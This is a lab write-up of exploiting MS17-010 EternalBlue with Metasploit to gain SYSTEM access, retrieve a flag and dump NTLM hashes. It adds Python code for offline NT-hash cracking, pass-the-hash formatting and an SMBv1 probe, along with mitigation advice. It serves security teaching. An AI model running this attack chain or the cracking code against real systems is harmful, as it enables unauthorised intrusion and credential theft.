Exploiting MS17-010 EternalBlue: SMB Flaw to SYSTEM Access
The exercise covered the full penetration testing workflow:
- Reconnaissance
- Vulnerability identification
- Exploitation
- Privilege verification
- Post-exploitation activities
Reconnaissance
The first step in any penetration test is understanding what is exposed. You cannot attack what you cannot see, and you should not attack blindly what you can.
I ran an Nmap version scan against the target:
nmap -sV <target-ip>
The scan revealed the following open ports and services:
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open tcpwrapped
49152/tcp open msrpc
49153/tcp open msrpc
49154/tcp open msrpc
49155/tcp open msrpc
The critical discovery was:
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds
Port 445 is the standard port for SMB, the Server Message Block protocol, carried directly over TCP. SMB handles Windows file sharing, printer sharing, and, through named pipes, a large share of Windows remote administration traffic (DCE/RPC over SMB). It is a core Windows networking protocol, which also makes it a historically significant attack surface.
The presence of port 445 combined with a Windows 7 to Windows 10 version banner immediately made SMB the primary attack surface worth investigating. Windows 7 and Server 2008 R2 ship with SMBv1 enabled, and SMBv1 has well-documented vulnerabilities, so the version range returned by the scan was enough to warrant deeper enumeration. Nmap's smb-vuln-ms17-010 script is the natural next step here: it probes for this one flaw without touching the overflow, and it takes seconds.
Vulnerability Identification
The target was running a Windows version in the range affected by a critical SMB vulnerability: MS17-010, widely known as EternalBlue.
MS17-010 is Microsoft's bulletin for a set of flaws in the Windows SMBv1 server implementation (srv.sys) that allow unauthenticated remote code execution. The EternalBlue exploit for it was developed by the NSA, leaked by the Shadow Brokers in April 2017, a month after Microsoft had already shipped the fix, and used weeks later by the WannaCry (May 2017) and NotPetya (June 2017) outbreaks that caused billions of dollars in damage worldwide.
The bulletin covers six CVEs (CVE-2017-0143 through CVE-2017-0148). The one EternalBlue exploits is tracked as:
CVE-2017-0144
Despite being patched on 14 March 2017 via Microsoft Security Bulletin MS17-010, a significant number of systems remain unpatched years later. This makes it one of the most consistently exploitable vulnerabilities in both lab environments and real-world engagements.
The Metasploit module for this vulnerability is:
exploit/windows/smb/ms17_010_eternalblue
The module sends crafted SMBv1 transaction requests that trigger a kernel pool buffer overflow in srv.sys: the driver miscalculates the size it needs when converting an OS/2-style extended attribute (FEA) list to NT format, and the resulting out-of-bounds write gives the attacker code execution in the kernel. The module turns that kernel-mode foothold into a payload running as NT AUTHORITY\SYSTEM, so no credentials are required at any stage. Because the bug corrupts kernel memory, a failed attempt frequently blue-screens the target, which is one more reason to verify before exploiting.
Exploitation
With a candidate vulnerability identified, I launched Metasploit:
msfconsole
I loaded the EternalBlue module:
use exploit/windows/smb/ms17_010_eternalblue
I configured the target host. The module's default payload is a reverse TCP Meterpreter, so LHOST must also point at an interface the target can reach (on a VPN-connected lab, the tunnel interface rather than the default one):
set RHOSTS <target-ip>
Before running the exploit, I verified that the target was actually vulnerable rather than assuming it based on the version banner alone:
check
The check confirmed the target was vulnerable to MS17-010. This step matters. Like the auxiliary/scanner/smb/smb_ms17_010 module, the check sends a harmless SMB transaction (a PeekNamedPipe request against a bogus file handle) and reads the status code that comes back: an unpatched host answers STATUS_INSUFF_SERVER_RESOURCES, a patched one does not. It can therefore say "vulnerable" without ever touching the overflow. Running exploits against systems that are not vulnerable wastes time and can cause unintended instability on production systems. Good practice is to verify before executing.
With confirmation, I executed the exploit:
run
The exploit succeeded. Metasploit returned a Meterpreter session on the target machine.
Obtaining Privileged Access
After receiving the Meterpreter shell, the first thing to verify is the current user context. Knowing where you are in the privilege hierarchy determines what you can do next.
getuid
The result:
Server username: NT AUTHORITY\SYSTEM
This confirmed that the session was already operating at the highest privilege level available on a Windows machine. SYSTEM (the LocalSystem account) sits above any interactive Administrator: it is not subject to UAC, it holds privileges such as SeDebugPrivilege and SeTcbPrivilege by default, and it can open protected registry hives such as SAM and SECURITY that are locked even to elevated Administrators. It has unrestricted access to the operating system, including protected files, registry keys, and system processes.
At this level, an attacker can:
- Read and modify any file on the system
- Access all user data across every account
- Dump credential hashes from memory and the SAM database
- Install or remove software and services
- Pivot to other systems on the network
- Disable security controls and logging
The fact that EternalBlue lands directly in a SYSTEM context without requiring any credential or privilege escalation step is what made it particularly dangerous in real-world attacks.
Finding the Flag
With SYSTEM privileges confirmed, I searched the filesystem for the flag file:
search -f flag.txt
The file was located at:
C:\Users\Jon\Documents\flag.txt
The file contents were retrieved directly through the Meterpreter session. No additional steps were needed because SYSTEM has unrestricted read access to every file on the machine, including files in other users' personal directories.
Extracting NTLM Hashes
The final objective was retrieving the NTLM hash of a user account named pirate.
NTLM hashes are the password representations Windows stores locally. The NT hash is the MD4 digest of the UTF-16LE encoded password with no salt, so it cannot be reversed directly, but two accounts with the same password share the same hash, and it cracks quickly offline with Hashcat (mode 1000) or John the Ripper (format NT). It can also be used as-is in pass-the-hash attacks against other systems on the same network, because NTLM authentication proves knowledge of the hash, not of the password.
Because I had SYSTEM privileges, I used the Meterpreter hashdump command:
hashdump
This command reads the local SAM database, which is only accessible from SYSTEM context, and prints one line per local account in the form user:RID:LM hash:NT hash:::. On modern systems the LM field is the constant aad3b435b51404eeaad3b435b51404ee, meaning no LM hash is stored; the NT field is the value that matters. The output contained the pirate account entry, and the NT hash value was extracted from the result.
This is one of the most common post-exploitation objectives in a real engagement. Once you have NTLM hashes, the attack surface expands significantly. Cracked credentials can be reused across other systems. Pass-the-hash techniques allow lateral movement without ever recovering the plaintext password.
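The NT-hash mechanics described above, as an added example that is not part of the original write-up. The hashdump lines it parses are constructed for illustration: the pirate entry carries the NT hash of the word "password", chosen so that the toy wordlist cracks it, and is not the hash from the room; the Administrator and Jon values are arbitrary placeholders. MD4 is implemented inline (RFC 1320) because hashlib on OpenSSL 3 builds often lacks it.

```python
import struct

# --- MD4 (RFC 1320), implemented inline because hashlib on OpenSSL 3 builds often lacks it ---
def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                     # pad: 0x80, zeros up to 56 mod 64, then 64-bit LE bit length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, additive constant, shift table, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, k, shifts, order in rounds:
            for i, xi in enumerate(order):
                r = (-i) % 4                              # register updated this step: a, d, c, b, a, ...
                x, y, z = v[(r + 1) % 4], v[(r + 2) % 4], v[(r + 3) % 4]
                v[r] = _rotl((v[r] + f(x, y, z) + X[xi] + k) & 0xFFFFFFFF, shifts[i % 4])
        state = [(s + t) & 0xFFFFFFFF for s, t in zip(state, v)]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16le")).hex()

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored

def parse_hashdump(text: str) -> list:
    """Parse Meterpreter hashdump lines of the form user:RID:LM:NT:::"""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.count(":") < 4:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries

def crack(entries: list, wordlist: list) -> dict:
    """Offline dictionary attack: hash each candidate once, then look up every account's NT hash."""
    table = {nt_hash(w): w for w in wordlist}
    return {e["user"]: table.get(e["nt"]) for e in entries}

def pth_hashes(entry: dict) -> str:
    """LM:NT form that pass-the-hash tools accept (for example impacket's -hashes option)."""
    return f"{entry['lm']}:{entry['nt']}"

# Constructed sample hashdump output (placeholder values, not the room's real output)
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
SAMPLE_WORDLIST = ["", "123456", "password", "letmein", "Password1"]   # constructed toy wordlist

if __name__ == "__main__":
    accounts = parse_hashdump(SAMPLE_HASHDUMP)
    for user, plain in crack(accounts, SAMPLE_WORDLIST).items():
        print(f"{user:14s} {'not in wordlist' if plain is None else repr(plain)}")
    pirate = next(e for e in accounts if e["user"] == "pirate")
    print("pass-the-hash value for pirate:", pth_hashes(pirate))
```

The Guest line cracks to the empty string, which is what a disabled Guest account with no password looks like in a dump; the two placeholder hashes stay uncracked, which is the normal outcome for anything not in the wordlist and the point at which you hand the NT hash to Hashcat or reuse it directly with pass-the-hash.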
The Full Attack Chain
Port Scanning
│
▼
SMB Discovery on Port 445
│
▼
MS17-010 Vulnerability Identified
│
▼
EternalBlue Exploitation
│
▼
Meterpreter Session Established
│
▼
NT AUTHORITY\SYSTEM Confirmed
│
▼
Flag Retrieved
│
▼
NTLM Hashes Dumped
The chain from initial port scan to credential extraction was entirely unauthenticated. No username. No password. No social engineering. Just an exposed port running a vulnerable protocol version.
Why This Still Matters in 2026
MS17-010 was patched in 2017. That is nine years ago. Yet it remains one of the most commonly encountered vulnerabilities in penetration testing engagements, particularly against internal networks, legacy systems, and environments with poor patch management discipline.
The reason is straightforward. Patching requires operational disruption. In environments where uptime is prioritized over security hygiene, patches get delayed indefinitely. Some systems run specialized software that vendors have not validated against newer OS versions, so organizations deliberately avoid patching to prevent compatibility issues. Others simply have no visibility into what is running on their network.
EternalBlue is not interesting because it is new. It is interesting because it demonstrates what happens when a critical vulnerability meets a predictable organizational failure: the assumption that because something has always worked, it is probably fine.
Mitigation
To prevent this type of attack:
- Apply security patches regularly, particularly critical severity patches for core protocol vulnerabilities
- Disable SMBv1 where it is not required, since SMBv2 and SMBv3 are not affected by MS17-010; Windows 10 1709 and later and Windows Server 2019 no longer install SMBv1 by default, but older builds and upgraded systems still carry it
- Avoid exposing SMB services directly to the internet or to untrusted network segments
- Use network segmentation to limit lateral movement even if a host is compromised
- Monitor for anomalous SMB traffic patterns, such as port 445 sweeps and SMBv1 negotiations from unexpected hosts, which can indicate scanning or exploitation attempts; public Suricata and Snort rule sets carry signatures for EternalBlue's transaction sequence
- Perform regular vulnerability assessments to identify unpatched systems before attackers do
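A way to answer the SMBv1 question raised in both the reconnaissance section and the mitigation list (does this host still negotiate SMBv1?), as an added example and not code from the original post. It speaks raw SMB1 over TCP/445: it offers only SMB1 dialects in a NEGOTIATE request, so a server that still has SMBv1 enabled must answer with an SMB1 header, while a server with SMBv1 disabled closes the connection instead (treating silence as "disabled" is an assumption about Windows behaviour, so confirm on a known host first). The reply built by sample_reply is constructed so the classifier can be exercised offline.

```python
import socket
import struct
import sys

SMB_COM_NEGOTIATE = 0x72
# SMB1-only dialect list: without "SMB 2.002" / "SMB 2.???" the server cannot switch to SMB2
SMB1_ONLY_DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12"]

def smb1_header(command: int, flags: int, pid: int = 0x1234, mid: int = 1) -> bytes:
    """32-byte SMB1 header (MS-CIFS 2.2.3.1), little-endian fields."""
    return struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB",      # protocol identifier
        command,         # SMB_COM_*
        0,               # NT status (0 in a request)
        flags,           # 0x18 in a request (case-insensitive, canonical paths); 0x98 in a reply
        0x2801,          # Flags2: long names, extended security, NT status codes
        0,               # PIDHigh
        b"\x00" * 8,     # SecurityFeatures (signature, unused here)
        0,               # Reserved
        0,               # TID
        pid & 0xFFFF,    # PIDLow
        0,               # UID
        mid,             # MID
    )

def nbss(payload: bytes) -> bytes:
    """NetBIOS session message: type 0x00 plus 24-bit big-endian length (one >I for len < 2**24)."""
    return struct.pack(">I", len(payload)) + payload

def build_negotiate_request() -> bytes:
    dialects = b"".join(b"\x02" + d + b"\x00" for d in SMB1_ONLY_DIALECTS)  # each dialect: 0x02 + ASCIIZ
    body = struct.pack("<BH", 0, len(dialects)) + dialects                   # WordCount=0, ByteCount
    return nbss(smb1_header(SMB_COM_NEGOTIATE, 0x18) + body)

def classify_negotiate_response(data: bytes) -> str:
    """Map the raw reply to one of: smb1 / smb1-rejected / smb2 / smb1-disabled."""
    if len(data) < 8:
        return "smb1-disabled"           # connection closed with no SMB reply (assumed: SMBv1 off)
    proto = data[4:8]                    # skip the 4-byte NetBIOS session header
    if proto == b"\xfeSMB":
        return "smb2"                    # server answered SMB2 despite an SMB1-only dialect list
    if proto != b"\xffSMB":
        return "smb1-disabled"
    if len(data) >= 39:
        dialect_index = struct.unpack_from("<H", data, 37)[0]  # WordCount at 36; DialectIndex is word 0
        if dialect_index == 0xFFFF:
            return "smb1-rejected"       # SMB1 framing, but none of the offered dialects accepted
    return "smb1"

def probe(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Send one NEGOTIATE and classify whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        try:
            data = s.recv(4096)
        except (ConnectionResetError, socket.timeout):
            data = b""
    return classify_negotiate_response(data)

def sample_reply(dialect_index: int) -> bytes:
    """Constructed, truncated SMB1 NEGOTIATE reply for offline use (a real reply carries 17 words plus data)."""
    return nbss(smb1_header(SMB_COM_NEGOTIATE, 0x98) + struct.pack("<BH", 17, dialect_index))

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", probe(sys.argv[1]))          # e.g. python3 smb1_probe.py <target-ip>
    else:
        print("constructed reply, dialect 2 ->", classify_negotiate_response(sample_reply(2)))
```

Run it against the lab target before and after disabling SMBv1 to see the result flip from smb1 to smb1-disabled; run it across a subnet to find the hosts the mitigation list is talking about. It deliberately stops at NEGOTIATE, so it never authenticates and never touches the vulnerable transaction path.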
Conclusion
This exercise covered the complete penetration testing workflow from initial enumeration to privileged access and post-exploitation activity.
The important skill is not running the exploit. Metasploit automates that. The important skill is understanding why the target was vulnerable, recognizing the attack surface from the reconnaissance output, choosing the correct exploitation path, and documenting the process in a way that communicates both what happened and why it matters.
Tools like Nmap and Metasploit are effective because the people using them understand the systems they are targeting. The tool executes the technique. The tester understands the consequence.